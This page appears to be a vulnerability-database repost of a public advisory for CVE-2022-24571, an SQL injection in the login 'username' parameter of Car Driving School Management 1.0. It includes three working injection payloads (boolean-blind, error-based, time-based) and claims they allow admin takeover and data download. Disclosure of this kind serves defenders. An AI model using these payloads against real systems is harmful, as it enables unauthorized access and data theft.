Lucene search
K

Car Driving School Management 1.0 SQL Injection

🗓️ 02 Mar 2022 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 344 Views

Car Driving School Mgmt 1.0 SQLi vuln. Allows admin acct takeover, data download. CRITICA

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Car Driving School Management 1.0 SQL Injection Vulnerability
2 Mar 202200:00
zdt
ATTACKERKB
CVE-2022-24571
28 Feb 202214:15
attackerkb
Circl
CVE-2022-24571
28 Feb 202216:23
circl
CNNVD
Car Driving School Management System SQL注入漏洞
28 Feb 202200:00
cnnvd
CNVD
Car Driving School Management System SQL Injection Vulnerability
2 Mar 202200:00
cnvd
CVE
CVE-2022-24571
28 Feb 202213:07
cve
Cvelist
CVE-2022-24571
28 Feb 202213:07
cvelist
EUVD
EUVD-2022-29450
3 Oct 202520:07
euvd
NVD
CVE-2022-24571
28 Feb 202214:15
nvd
OSV
CVE-2022-24571
28 Feb 202214:15
osv
Rows per page
`## Title: Car Driving School Management v1.0 SQLi  
## Author: nu11secur1ty  
## Date: 03.02.2022  
## Vendor: https://www.sourcecodester.com/users/tips23  
## Software: https://www.sourcecodester.com/php/15070/car-driving-school-management-system-phpoop-free-source-code.html  
## Reference: https://github.com/nu11secur1ty/CVE-mitre/blob/main/2022/CVE-2022-24571  
  
## Description:  
The `username` parameter on Car Driving School Management v1.0 appears  
to be vulnerable to SQL injection attacks.  
A single quote was submitted in the username parameter, and a database  
error message was returned.  
Two single quotes were then submitted and the error message disappeared.  
The attacker can take administrator account control and also of all  
accounts on this system, also the malicious user can download all  
information about this system.  
  
Status: CRITICAL  
  
[+] Payloads:  
  
```mysql  
  
---  
Parameter: username (POST)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: username=DMdqCjGG' OR NOT 6823=6823-- yrqx&password=a5Y!f7m!O0  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: username=DMdqCjGG' AND (SELECT 9746 FROM(SELECT  
COUNT(*),CONCAT(0x71786b7671,(SELECT  
(ELT(9746=9746,1))),0x7171787a71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gzNl&password=a5Y!f7m!O0  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=DMdqCjGG' AND (SELECT 9290 FROM  
(SELECT(SLEEP(5)))RWHi)-- vsyd&password=a5Y!f7m!O0  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-mitre/blob/main/2022/CVE-2022-24571)  
  
## Proof and Exploit:  
[href](https://streamable.com/n9r8uk)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Mar 2022 00:00Current
1.4Low risk
Vulners AI Score1.4
EPSS0.00322
344